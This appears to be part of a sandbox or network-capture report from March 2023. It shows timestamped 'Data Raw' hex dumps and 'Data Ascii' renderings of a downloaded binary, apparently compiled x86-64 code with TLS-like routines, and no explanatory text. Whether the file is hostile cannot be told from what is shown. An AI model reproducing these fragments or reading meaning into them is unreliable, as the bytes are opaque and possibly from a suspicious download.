                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1281INData Raw: 01 00 00 00 e8 c2 b0 4b 00 48 8b 54 24 28 48 89 42 08 48 8b 54 24 40 48 89 42 08 e9 ae fb ff ff 31 c9 4d 85 c0 0f 85 cc f3 ff ff e9 0d ef ff ff 4d 85 c0 0f 85 84 f2 ff ff 31 c9 e9 25 e9 ff ff 4d 85 c0 0f 85 e8 f2 ff ff 31 c9 e9 25 ea ff ff 4d 85 c0 0f 85 9e f2 ff ff 31 c9 e9 25 eb ff ff 48 85 c0 0f 85 dc f1 ff ff 31 c9 e9 13 ec ff ff 44 89 fa 48 89 44 24 30 48 c1 e2 05 49 89 d1 48 ba ff ff ff ff ff ff 00 00 48 21 c2 74 2d 4d 85 c9 74 31 44 89 c0 48 89 d1 48 c1 e0 05 49 89 c2 48 89 44 24 38 4c 89 c8 4d 39 ca 0f 83 17 f0 ff ff 48 89 54 24 40 e9 b4 ef ff ff 4d 85 c9 0f 85 6e f6 ff ff 31 c9 e9 fd ef ff ff 4d 85 c0 0f 85 af f1 ff ff 31 c9 e9 77 e7 ff ff 49 89 c4 4c 89 e9 e8 65 ba 47 00 4c 89 e1 e8 4d df 2e 00 48 8b 4c 24 60 49 89 c4 48 85 c9 74 e3 e8 6b af 4b
                                                                                                                                                                                                                    Data Ascii: KHT$(HBHT$@HB1MM1%M1%M1%H1DHD$0HIHH!t-Mt1DHHIHD$8LM9HT$@Mn1M1wILeGLM.HL$`IHtkK
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1297INData Raw: b8 de c0 ad de 66 0f 1f 44 00 00 48 8b 09 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 41 54 41 55 41 56 41 57 48 83 ec 40 0f ae 1c 24 c7 44 24 04 80 5f 00 00 0f ae 54 24 04 48 8b 41 30 49 89 c9 48 33 41 10 bd 00 00 08 00 4c 8b 41 20 4c 33 01 4c 8b 59 28 4d 89 c2 48 8b 51 38 66 48 0f 6e d8 48 33 51 18 4c 33 59 08 48 8b 99 e0 00 00 00 49 8b 41 50 49 33 41 40 66 48 0f 6e c2 48 8b 49 58 49 33 49 48 49 8b 79 68 41 81 e2 f0 ff 1f 00 0f 29 74 24 30 66 48 0f 6e e0 0f 29 7c 24 20 44 0f 29 44 24 10 45 0f 57 c0 66 b8 ff 03 48 c1 e0 34 66 48 0f 6e f8 4d 8b 79 60 66 0f 6c d8 66 48 0f 6e c1 66 0f 6c e0 0f 1f 00 66 41 0f 6f 2c 1a 66 49 0f 6e c3 66 49 0f 6e f0 66 0f 6c f0 49 8d 14 1a 4c 8d 0c 3f 48 c1 e7 20 44 89 d1 44 89 d0 83 f1 10 83 f0 20 41 83 f2 30 66 0f 38 dc
                                                                                                                                                                                                                    Data Ascii: fDHH\$Hl$Ht$ WATAUAVAWH@$D$_T$HA0IH3ALA L3LY(MHQ8fHnH3QL3YHIAPI3A@fHnHIXI3IHIyhA)t$0fHn)|$ D)D$EWfH4fHnMy`flfHnflfAo,fInfInflIL?H DD A0f8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1313INData Raw: b6 39 48 85 c0 74 3d 49 8b 94 24 c0 00 00 00 44 89 5c 24 5c 41 b8 15 00 00 00 31 c9 44 89 54 24 48 48 89 54 24 30 4c 89 64 24 28 48 c7 44 24 20 02 00 00 00 41 8b 14 24 ff d0 44 8b 5c 24 5c 44 8b 54 24 48 41 0f b6 c7 4d 8b bc 24 68 05 00 00 4d 85 ff 0f 84 1a 04 00 00 66 41 c1 c2 08 44 89 5c 24 5c ba 04 40 00 00 4c 89 e1 89 44 24 48 45 0f b7 c2 41 ff d7 4c 89 7c 24 50 44 8b 5c 24 5c 8b 44 24 48 83 f8 01 0f 85 b8 06 00 00 49 8b 84 24 a8 00 00 00 44 89 98 f4 00 00 00 41 8b 84 24 dc 16 00 00 41 c7 84 24 b0 0d 00 00 01 00 00 00 83 c0 01 41 89 84 24 dc 16 00 00 83 f8 05 0f 84 62 06 00 00 45 85 db 0f 85 23 fe ff ff 41 83 4c 24 44 02 eb 39 66 0f 1f 44 00 00 48 8d 05 89 eb 53 00 c7 44 24 28 30 02 00 00 41 b9 cd 00 00 00 48 89 44 24 20 41 b8 02 01 00 00 ba 0a 00 00
                                                                                                                                                                                                                    Data Ascii: 9Ht=I$D\$\A1DT$HHT$0Ld$(HD$ A$D\$\DT$HAM$hMfAD\$\@LD$HEAL|$PD\$\D$HI$DA$A$A$bE#AL$D9fDHSD$(0AHD$ A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1329INData Raw: 57 56 53 48 83 ec 38 48 89 91 48 08 00 00 49 89 cc 48 89 d5 4c 89 c7 4d 85 c0 75 65 48 8b 41 08 48 8b 80 c0 00 00 00 8b 40 60 83 e0 08 83 f8 01 48 19 db 48 83 e3 f7 48 83 c3 65 83 f8 01 48 19 f6 e8 05 8c 01 00 48 83 e6 f7 4c 89 e1 48 83 c6 0e 8d 78 50 e8 22 64 03 00 48 01 f7 41 89 c0 48 8d 47 07 48 81 c7 07 04 00 00 45 85 c0 48 0f 44 f8 48 01 fb 41 f6 84 24 cd 05 00 00 08 48 0f 44 fb 49 8d 9c 24 80 08 00 00 4c 8d 2d 5b ad 53 00 31 f6 48 85 ed 74 6b 0f 1f 40 00 48 8b 4b f8 48 85 c9 74 1c 48 39 7b 08 74 4b 41 b8 72 00 00 00 4c 89 ea e8 93 9f 0b 00 48 c7 43 f8 00 00 00 00 41 b8 77 00 00 00 4c 89 ea 48 89 f9 e8 aa 9f 0b 00 48 85 c0 74 3e 48 c7 03 00 00 00 00 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 48 89 43 f8 48 89 7b 08 48 83 c6 01 48 83 c3 28 48 39
                                                                                                                                                                                                                    Data Ascii: WVSH8HHIHLMueHAH@`HHHeHHLHxP"dHAHGHEHDHA$HDI$L-[S1Htk@HKHtH9{tKArLHCAwLHHt>HHCHCHCH{HH(H9
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1345INData Raw: 60 04 00 4c 8b 54 24 38 44 8b 5c 24 40 85 c0 0f 84 66 02 00 00 8b 53 04 41 b8 01 00 00 00 4c 89 e9 44 89 5c 24 40 4c 89 54 24 38 e8 fb 69 04 00 85 c0 0f 84 43 02 00 00 8b 13 41 b8 02 00 00 00 4c 89 e9 e8 e3 69 04 00 85 c0 0f 84 2b 02 00 00 8b 54 24 4c 41 b8 02 00 00 00 03 53 08 4c 89 e9 e8 c6 69 04 00 85 c0 0f 84 0e 02 00 00 48 8d 54 24 68 4c 89 e9 e8 11 70 04 00 85 c0 0f 84 f9 01 00 00 48 83 7c 24 68 05 0f 85 ed 01 00 00 4c 89 e9 e8 75 66 04 00 85 c0 0f 84 dd 01 00 00 83 7c 24 48 00 4c 8b 54 24 38 44 8b 5c 24 40 0f 85 b5 02 00 00 48 8d 6c 24 58 c7 44 24 20 05 00 00 00 31 d2 49 89 f9 49 89 e8 4c 89 f1 44 89 5c 24 40 4c 89 54 24 38 e8 91 64 0a 00 4c 8b 54 24 38 44 8b 5c 24 40 85 c0 0f 8e ec 00 00 00 48 8b 43 08 48 8b 53 20 49 89 e8 4c 89 f1 4c 8b 4b 28 44
                                                                                                                                                                                                                    Data Ascii: `LT$8D\$@fSALD\$@LT$8iCALi+T$LASLiHT$hLpH|$hLuf|$HLT$8D\$@Hl$XD$ 1IILD\$@LT$8dLT$8D\$@HCHS ILLK(D
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1361INData Raw: 12 00 00 4c 8d 05 21 2f 53 00 48 8b 88 c8 02 00 00 e8 55 24 0b 00 48 8b 4b 08 4d 89 f1 4d 89 f8 48 8b 83 a8 00 00 00 4c 8b 91 c0 00 00 00 48 89 d9 48 c7 80 c8 02 00 00 00 00 00 00 48 c7 80 d0 02 00 00 00 00 00 00 48 8b 83 08 05 00 00 48 8d 50 50 48 83 c0 08 48 89 44 24 20 41 ff 52 18 89 c7 85 c0 0f 84 32 01 00 00 41 b9 20 12 00 00 4c 8d 05 b5 2e 53 00 4c 89 f2 4c 89 f9 e8 ea 23 0b 00 bf 01 00 00 00 4d 85 ed 74 20 85 f6 0f 84 f8 00 00 00 41 b9 32 12 00 00 4c 8d 05 8b 2e 53 00 4c 89 e2 4c 89 e9 e8 c0 23 0b 00 8b 43 38 85 c0 75 1d 48 8b 83 a8 00 00 00 48 c7 80 b8 02 00 00 00 00 00 00 48 c7 80 c0 02 00 00 00 00 00 00 89 f8 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 84 00 00 00 00 00 4c 8d 74 3f 04 41 b8 09 12 00 00 44 89 54 24 3c 48 8d 15 29
                                                                                                                                                                                                                    Data Ascii: L!/SHU$HKMMHLHHHHHPPHHD$ AR2A L.SLL#Mt A2L.SLL#C8uHHHHH[^_]A\A]A^A_fLt?ADT$<H)
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1377INData Raw: ea 48 8b 0e 4c 8b 1f 48 89 cd 4c 89 db 4d 85 db 74 5f 48 85 c9 75 09 eb 58 66 90 49 39 c3 74 51 48 89 c8 48 8b 49 10 4c 8b 10 45 39 42 44 75 3c 8b 50 08 85 d2 74 35 48 39 d8 74 30 48 8b 50 18 48 39 e8 48 0f 44 e9 48 85 d2 74 04 48 89 4a 10 48 85 c9 74 04 48 89 51 18 48 89 43 10 48 c7 40 10 00 00 00 00 48 89 58 18 48 89 c3 48 85 c9 75 aa 49 83 e8 01 48 89 2e 48 89 1f 41 83 f8 ff 0f 85 74 ff ff ff 41 b8 b9 03 00 00 4c 89 e2 4c 89 c9 e8 b5 df 0a 00 b8 01 00 00 00 48 83 c4 30 5b 5e 5f 5d 41 5c c3 0f 1f 44 00 00 48 8b 40 10 48 85 c0 0f 85 03 ff ff ff e9 20 ff ff ff b9 04 00 00 00 31 db e9 c9 fe ff ff c7 44 24 20 a3 03 00 00 4d 89 e1 41 b8 41 00 00 00 ba e7 00 00 00 b9 14 00 00 00 e8 02 b3 08 00 31 c0 eb ae 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 57 41 56
                                                                                                                                                                                                                    Data Ascii: HLHLMt_HuXfI9tQHHILE9BDu<Pt5H9t0HPH9HDHtHJHtHQHCH@HXHHuIH.HAtALLH0[^_]A\DH@H 1D$ MAA1ff.AWAV
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1393INData Raw: c0 48 83 c4 38 c3 0f 1f 44 00 00 44 8b 02 44 89 81 e8 04 00 00 42 8b 54 0a fc 42 89 54 08 fc e9 74 ff ff ff 0f 1f 80 00 00 00 00 56 53 48 83 ec 28 48 89 cb 48 8b 89 80 03 00 00 48 89 d6 e8 38 26 10 00 48 89 b3 90 01 00 00 48 8b 8b 80 03 00 00 e8 45 26 10 00 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 0f 1f 84 00 00 00 00 00 56 53 48 83 ec 28 48 89 cb 48 8b 89 38 17 00 00 48 89 d6 e8 f8 25 10 00 48 89 b3 28 05 00 00 48 8b 8b 38 17 00 00 e8 05 26 10 00 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 0f 1f 84 00 00 00 00 00 56 53 48 81 ec 98 02 00 00 31 c0 48 89 cb 41 83 f8 20 76 0c 48 81 c4 98 02 00 00 5b 5e c3 66 90 8b 01 4c 8d 8c 24 78 01 00 00 89 44 24 20 44 89 c0 48 89 84 24 70 01 00 00 41 83 f8 08 73 69 41 f6 c0 04 0f 85 bf 00 00 00 45 85 c0 0f 85 8e 00 00 00 48 8b
                                                                                                                                                                                                                    Data Ascii: H8DDDBTBTtVSH(HHH8&HHE&H([^fVSH(HH8H%H(H8&H([^fVSH1HA vH[^fL$xD$ DH$pAsiAEH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1409INData Raw: 2e 0f 1f 84 00 00 00 00 00 66 90 48 85 c9 74 16 b8 ff ff ff ff f0 0f c1 81 c8 05 00 00 83 e8 01 85 c0 74 07 7e 05 c3 0f 1f 40 00 e9 8b fb ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 41 55 41 54 56 53 48 83 ec 38 48 89 cb 48 85 c9 0f 84 0a 06 00 00 4c 8b 21 4d 85 e4 0f 84 ae 05 00 00 4c 8d 2d 67 bc 52 00 41 b8 b3 02 00 00 b9 78 17 00 00 4c 89 ea e8 a4 61 0a 00 49 89 c4 48 85 c0 0f 84 2a 05 00 00 48 8d b0 c8 05 00 00 b8 01 00 00 00 87 06 e8 55 e5 0f 00 49 89 84 24 38 17 00 00 48 85 c0 0f 84 94 05 00 00 49 8d 8c 24 30 08 00 00 4c 89 e2 e8 74 8a fe ff 8b 83 20 01 00 00 48 8b 4b 18 41 89 84 24 cc 05 00 00 8b 83 6c 03 00 00 41 89 84 24 0c 01 00 00 48 8b 83 28 01 00 00 49 89 84 24 d4 05 00 00 8b 83 24 01 00 00 41 89 84 24 d0 05 00 00 48 8b 83 30 01 00 00 49 89 84 24
                                                                                                                                                                                                                    Data Ascii: .fHtt~@ff.AUATVSH8HHL!ML-gRAxLaIH*HUI$8HI$0Lt HKA$lA$H(I$$A$H0I$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1425INData Raw: 89 ea 48 89 c1 49 81 c7 b8 00 00 00 e8 c2 92 2d 00 c6 03 20 48 8d 7b 01 48 8d 6b 41 48 8d 35 b6 7c 52 00 0f 1f 84 00 00 00 00 00 45 0f b6 07 48 89 f9 48 89 f2 48 83 c7 02 49 83 c7 01 e8 79 72 ff ff 48 39 fd 75 e4 48 83 bc 24 a8 00 00 00 00 c6 43 41 20 48 8d 6b 42 74 3f 48 8b 9c 24 a0 00 00 00 48 8b bc 24 a8 00 00 00 49 89 ef 48 01 df 0f 1f 00 44 0f b6 03 4c 89 f9 48 89 f2 48 83 c3 01 49 83 c7 02 e8 31 72 ff ff 48 39 df 75 e4 48 8b 44 24 38 48 8d 6c 05 c0 c6 45 00 00 49 8b 84 24 98 05 00 00 4c 89 ea 4c 89 e1 ff 90 88 03 00 00 41 b9 b6 14 00 00 4c 89 f2 4c 89 e9 4c 8d 05 07 7c 52 00 e8 a2 23 0a 00 b8 01 00 00 00 48 83 c4 48 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 40 00 b8 01 00 00 00 eb e4 90 31 db e9 c7 fe ff ff 66 0f 1f 84 00 00 00 00 00 c7 44 24 28
                                                                                                                                                                                                                    Data Ascii: HI- H{HkAH5|REHHHIyrH9uH$CA HkBt?H$H$IHDLHHI1rH9uHD$8HlEI$LLALLL|R#HH[^_]A\A]A^A_@1fD$(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1441INData Raw: 44 24 60 4c 89 4c 24 20 4d 89 c1 49 89 d0 48 89 ca 89 44 24 28 31 c9 e8 3f d8 ff ff 48 83 c4 38 c3 90 90 90 90 90 90 90 90 90 90 55 57 56 53 48 83 ec 28 bb 0a 00 00 00 48 89 cd 48 89 d7 4c 89 c6 66 2e 0f 1f 84 00 00 00 00 00 8b 16 48 89 f9 e8 86 1a 0c 00 85 c0 7e 17 44 8b 06 48 89 fa 48 89 e9 e8 44 40 ff ff 85 c0 74 10 83 eb 01 75 db 31 c0 48 83 c4 28 5b 5e 5f 5d c3 b8 01 00 00 00 48 83 c4 28 5b 5e 5f 5d c3 66 90 41 54 53 48 83 ec 28 48 8d 1d c2 41 52 00 49 89 cc 4c 8d 81 f0 01 00 00 48 89 ca b9 02 00 00 00 e8 ab 78 09 00 49 8d 4c 24 50 ba 00 01 00 00 e8 dc d6 11 00 49 8d 8c 24 58 01 00 00 ba 20 00 00 00 e8 ca d6 11 00 49 8b 8c 24 b8 01 00 00 e8 2d 97 10 00 49 8b 8c 24 c0 01 00 00 48 8b 15 9e 04 5f 00 e8 89 5a 0f 00 49 8b 8c 24 08 02 00 00 48 89 da 41 b8
                                                                                                                                                                                                                    Data Ascii: D$`LL$ MIHD$(1?H8UWVSH(HHLf.H~DHHD@tu1H([^_]H([^_]fATSH(HARILHxIL$PI$X I$-I$H_ZI$HA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1457INData Raw: 00 00 01 00 74 75 81 39 00 03 00 00 75 0d 41 f6 c1 08 74 93 0f 1f 80 00 00 00 00 41 f6 c1 10 75 86 8b a9 c8 00 00 00 85 ed 0f 84 15 ff ff ff e9 0a ff ff ff 0f 1f 80 00 00 00 00 8b 51 38 85 d2 0f 84 ee fe ff ff 44 8b 81 c8 00 00 00 45 85 c0 74 11 41 83 e1 40 0f 85 4b ff ff ff 0f 1f 80 00 00 00 00 48 8d 14 c5 00 00 00 00 48 29 c2 48 8b 44 d7 10 e9 e9 fe ff ff 0f 1f 00 81 39 00 03 00 00 0f 85 96 fe ff ff 41 f6 c1 08 0f 85 8c fe ff ff e9 11 ff ff ff 0f 1f 44 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 48 31 db 4c 8d 2d 17 02 52 00 48 8b 81 88 04 00 00 4c 8b a4 24 b0 00 00 00 48 8b b8 e0 01 00 00 49 89 cf 41 89 d6 4c 89 c6 4c 89 cd 48 83 c7 1a 75 68 e9 d2 00 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 8d 14 c5 00 00 00 00 45 89 f0 4c 89 f9 48 29 c2 4d 8d 5c
                                                                                                                                                                                                                    Data Ascii: tu9uAtAuQ8DEtA@KHH)HD9ADAWAVAUATUWVSHH1L-RHL$HIALLHuhf.HELH)M\
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1473INData Raw: 4c 89 e1 45 31 ed e8 f0 5d 00 00 44 89 e8 48 83 c4 48 5e 5f 41 5c 41 5d c3 66 90 48 8d 05 69 c8 51 00 41 b9 6e 00 00 00 ba 6e 00 00 00 c7 44 24 28 26 06 00 00 48 89 44 24 20 41 b8 46 02 00 00 4c 89 e1 45 31 ed e8 b0 5d 00 00 44 89 e8 48 83 c4 48 5e 5f 41 5c 41 5d c3 66 90 c7 44 24 28 43 06 00 00 41 b9 44 00 00 00 41 b8 46 02 00 00 4c 89 e1 48 89 74 24 20 ba 50 00 00 00 49 c7 84 24 00 07 00 00 00 00 00 00 e8 6e 5d 00 00 e9 21 fe ff ff 8b 0e 89 08 8b 4c 16 fc 89 4c 10 fc 0f b6 54 24 37 e9 cb fe ff ff 0f 1f 00 41 56 41 55 41 54 55 57 56 53 48 83 ec 30 4c 8b 89 a8 00 00 00 45 8b a9 00 04 00 00 49 89 cc 48 89 d3 45 85 ed 74 79 48 8b 42 08 48 83 f8 01 76 26 48 8b 0a 0f b7 11 4c 8d 41 02 4c 89 03 4c 8d 40 fe 4c 89 43 08 66 c1 c2 08 4d 85 c0 74 08 0f b7 d2 4c 39
                                                                                                                                                                                                                    Data Ascii: LE1]DHH^_A\A]fHiQAnnD$(&HD$ AFLE1]DHH^_A\A]fD$(CADAFLHt$ PI$n]!LLT$7AVAUATUWVSH0LEIHEtyHBHv&HLALL@LCfMtL9
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1489INData Raw: 00 00 00 49 83 bc 24 80 05 00 00 00 74 0d 48 81 fd 80 00 00 00 0f 86 6d 01 00 00 41 8b 84 24 cc 05 00 00 f6 c4 40 0f 85 ef 00 00 00 41 8b 94 24 10 17 00 00 85 d2 74 0b a9 00 00 00 01 0f 84 d8 00 00 00 45 31 c9 49 89 e8 4c 89 d2 4c 89 e1 48 8d 84 24 88 00 00 00 48 c7 44 24 20 00 00 00 00 48 89 44 24 28 e8 91 9d 01 00 83 f8 03 0f 84 88 03 00 00 83 f8 01 0f 86 8c 03 00 00 83 e8 02 83 e0 fd 0f 84 fc fe ff ff 41 8b 84 24 10 17 00 00 85 c0 74 0f 41 f6 84 24 cf 05 00 00 01 0f 84 c0 01 00 00 31 c9 ff 15 5c 1b 99 00 48 8b ac 24 88 00 00 00 45 85 ff 0f 85 36 fd ff ff 2b 85 d4 01 00 00 39 85 d0 01 00 00 0f 8c 24 fd ff ff ba e8 03 00 00 f7 e2 0f 80 17 fd ff ff 8b 54 24 68 05 e8 03 00 00 0f ca 2b 95 24 02 00 00 39 d0 0f 82 fe fc ff ff 81 c2 10 27 00 00 39 d0 0f 87 f0
                                                                                                                                                                                                                    Data Ascii: I$tHmA$@A$tE1ILLH$HD$ HD$(A$tA$1\H$E6+9$T$h+$9'9
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1505INData Raw: ba 50 00 00 00 c7 44 24 28 80 0c 00 00 48 89 44 24 20 41 b8 96 01 00 00 4c 89 e1 e8 db dd ff ff 31 c0 e9 48 ff ff ff 0f 1f 40 00 c7 44 24 28 8e 0c 00 00 41 b9 41 00 00 00 48 89 7c 24 20 e9 eb fe ff ff c7 44 24 28 c2 0c 00 00 e9 d3 fe ff ff c7 44 24 28 b0 0c 00 00 41 b9 12 01 00 00 48 89 7c 24 20 e9 c6 fe ff ff c7 44 24 28 ba 0c 00 00 41 b9 12 01 00 00 48 89 7c 24 20 e9 ae fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 56 53 48 83 ec 48 48 8b 81 a8 00 00 00 48 8b 80 38 02 00 00 8b 70 1c 48 89 cb 49 89 d4 f7 c6 c8 01 00 00 75 53 40 f6 c6 41 0f 85 f1 00 00 00 f7 c6 02 01 00 00 0f 85 85 02 00 00 40 f6 c6 84 0f 85 f3 03 00 00 40 f6 c6 10 0f 85 39 03 00 00 40 f6 c6 20 0f 85 4f 04 00 00 83 e6 08 0f 84 7e 06 00 00 b8 01 00 00 00 48 83 c4 48 5b
                                                                                                                                                                                                                    Data Ascii: PD$(HD$ AL1H@D$(AAH|$ D$(D$(AH|$ D$(AH|$ ff.AWAVAUATVSHHHH8pHIuS@A@@9@ O~HH[
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1521INData Raw: ba 71 00 00 00 c7 44 24 28 0d 0b 00 00 48 89 44 24 20 41 b8 ba 01 00 00 4c 89 e1 e8 db 9d ff ff 31 c0 e9 01 fe ff ff 0f 1f 40 00 48 8d 05 59 09 51 00 41 b9 26 01 00 00 ba 50 00 00 00 c7 44 24 28 13 0b 00 00 48 89 44 24 20 41 b8 ba 01 00 00 4c 89 e1 e8 a3 9d ff ff 31 c0 e9 c9 fd ff ff 0f 1f 40 00 89 44 24 3c 48 8d 05 1d 09 51 00 ba 28 00 00 00 41 b9 a9 00 00 00 48 89 44 24 20 41 b8 82 00 00 00 4c 89 e1 c7 44 24 28 21 0e 00 00 e8 67 9d ff ff 8b 44 24 3c e9 8b fd ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 55 41 54 53 48 83 ec 30 48 8b 81 a8 00 00 00 4c 8b a0 b8 02 00 00 4c 8b a8 c0 02 00 00 48 8b 80 38 02 00 00 48 89 cb 8b 40 1c a8 20 0f 85 ad 00 00 00 4d 85 e4 74 28 41 b9 01 00 00 00 4d 89 e8 4c 89 e2 48 89 d9 e8 34 7e fd ff 85 c0 74 40 b8 01 00 00
                                                                                                                                                                                                                    Data Ascii: qD$(HD$ AL1@HYQA&PD$(HD$ AL1@D$<HQ(AHD$ ALD$(!gD$<ff.AUATSH0HLLH8H@ Mt(AMLH4~t@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1537INData Raw: 0f 1f 00 41 8b 45 28 85 c0 75 61 49 8b 4d 58 41 b8 67 00 00 00 4c 89 f2 e8 2e 60 08 00 49 8b 4d 60 41 b8 68 00 00 00 4c 89 f2 e8 1c 60 08 00 41 b8 69 00 00 00 4c 89 f2 4c 89 e9 e8 0b 60 08 00 31 c0 e9 46 fe ff ff c7 44 24 20 3f 00 00 00 4d 89 f1 41 b8 41 00 00 00 ba 6f 02 00 00 b9 14 00 00 00 e8 84 33 06 00 e9 1f fe ff ff 49 8b 4d 30 e8 e6 5e 07 00 49 8b 4d 38 e8 3d 5a 06 00 eb 8b 90 90 90 90 90 90 90 90 90 90 90 41 56 41 55 41 54 57 56 53 48 83 ec 48 49 89 cc 49 89 d5 4c 89 c1 31 d2 4c 89 c6 49 63 f9 e8 3d 17 0f 00 89 c3 85 c0 0f 88 a3 00 00 00 4c 8d 74 24 38 48 63 d0 41 b9 03 00 00 00 4c 89 e9 4d 89 f0 e8 4a 5b 01 00 85 c0 74 46 4c 89 f2 48 89 f1 e8 0b 17 0f 00 39 d8 75 37 49 8b 54 24 08 b8 01 00 00 00 48 8b 8a c0 00 00 00 f6 41 60 08 75 4f 8b 02 3d 03
                                                                                                                                                                                                                    Data Ascii: AE(uaIMXAgL.`IM`AhL`AiLL`1FD$ ?MAAo3IM0^IM8=ZAVAUATWVSHHIIL1LIc=Lt$8HcALMJ[tFLH9u7IT$HA`uO=
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1553INData Raw: 0f 1f 84 00 00 00 00 00 0f 1f 00 41 56 41 55 41 54 55 57 56 53 48 83 ec 30 48 8d 2d eb 8f 50 00 4d 8d 71 40 49 89 cc 48 89 d7 4d 89 c5 48 89 ea 41 b8 46 09 00 00 4c 89 f1 4c 89 ce e8 3a 20 08 00 48 89 c3 48 85 c0 74 6a 49 8b 84 24 a8 00 00 00 48 8d 4b 40 49 89 f0 4c 89 ea f3 0f 6f 80 b8 00 00 00 0f 11 03 f3 0f 6f 88 c8 00 00 00 0f 11 4b 10 49 8b 84 24 a8 00 00 00 f3 0f 6f 90 98 00 00 00 0f 11 53 20 f3 0f 6f 98 a8 00 00 00 0f 11 5b 30 e8 ac 91 2b 00 48 89 1f 4c 89 f0 48 83 c4 30 5b 5e 5f 5d 41 5c 41 5d 41 5e c3 0f 1f 80 00 00 00 00 48 89 6c 24 20 ba 50 00 00 00 4c 89 e1 45 31 f6 c7 44 24 28 49 09 00 00 41 b9 41 00 00 00 41 b8 29 02 00 00 e8 1f 1d ff ff eb bc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 41 54 48 83 ec 40 48 83 b9 a8 07 00 00 00 49 89 cc 74 0d b8
                                                                                                                                                                                                                    Data Ascii: AVAUATUWVSH0H-PMq@IHMHAFLL: HHtjI$HK@ILooKI$oS o[0+HLH0[^_]A\A]A^Hl$ PLE1D$(IAAA)ff.fATH@HIt
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1569INData Raw: 00 00 00 48 83 ba 98 01 00 00 00 0f 84 e2 00 00 00 48 83 ba 20 02 00 00 00 0f 84 d4 00 00 00 c7 44 24 28 92 05 00 00 41 b9 f4 00 00 00 41 b8 7d 01 00 00 4c 89 e1 4c 89 74 24 20 ba 0a 00 00 00 e8 b6 dd fe ff 49 8b 8d 88 02 00 00 41 b8 45 06 00 00 4c 89 f2 e8 f1 df 07 00 41 b8 46 06 00 00 4c 89 f2 4c 89 e9 e8 e0 df 07 00 31 c0 48 83 c4 48 5b 5e 5f 41 5c 41 5d 41 5e c3 48 83 b8 20 02 00 00 00 0f 84 d5 fc ff ff 49 8b 54 24 08 48 8b 8a c0 00 00 00 f6 41 60 08 0f 85 5c 01 00 00 8b 12 81 fa 00 00 01 00 0f 84 4e 01 00 00 81 fa 03 03 00 00 0f 8e 42 01 00 00 4c 8d 35 ab 52 50 00 41 b9 44 00 00 00 ba 50 00 00 00 c7 44 24 28 71 05 00 00 4c 89 74 24 20 41 b8 7d 01 00 00 4c 89 e1 45 31 ed e8 12 dd fe ff e9 6c ff ff ff 0f 1f 44 00 00 41 8b 94 24 d8 04 00 00 85 d2 0f 85
                                                                                                                                                                                                                    Data Ascii: HH D$(AA}LLt$ IAELAFLL1HH[^_A\A]A^H IT$HA`\NBL5RPADPD$(qLt$ A}LE1lDA$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1585INData Raw: 0f 84 7b ff ff ff eb d3 0f 1f 00 49 89 d1 31 c0 49 83 e1 f8 4c 8b 04 01 4c 89 44 05 00 48 83 c0 08 4c 39 c8 72 ee 4c 8d 44 05 00 48 01 c8 e9 42 ff ff ff 0f 1f 84 00 00 00 00 00 4c 8d 6c 24 2c 4c 8d 64 24 28 49 89 e8 4c 89 ea 4c 89 e1 e8 f8 fd ff ff 4c 8d 46 01 4c 89 ea 4c 89 e1 e8 e9 fd ff ff 44 8b 44 24 28 45 85 c0 0f 84 4b ff ff ff 8b 54 24 2c 85 d2 0f 84 3f ff ff ff 48 8d 05 08 1c 50 00 48 8d 88 10 04 00 00 eb 14 0f 1f 80 00 00 00 00 48 83 c0 28 48 39 c8 0f 84 1b ff ff ff 3b 50 0c 75 ee 44 3b 40 14 75 e8 48 8b 3b 48 8d 57 01 48 89 13 0f b7 50 08 66 89 54 7b 08 eb 4c 0f 1f 00 48 8d 35 c1 1b 50 00 4c 8d a6 10 04 00 00 eb 15 0f 1f 84 00 00 00 00 00 48 83 c6 28 4c 39 e6 0f 84 d3 fe ff ff 48 8b 16 48 85 d2 74 eb 48 89 e9 e8 cb 11 2b 00 85 c0 75 df 0f b7 56
                                                                                                                                                                                                                    Data Ascii: {I1ILLDHL9rLDHBLl$,Ld$(ILLLFLLDD$(EKT$,?HPHH(H9;PuD;@uH;HWHPfT{LH5PLH(L9HHtH+uV
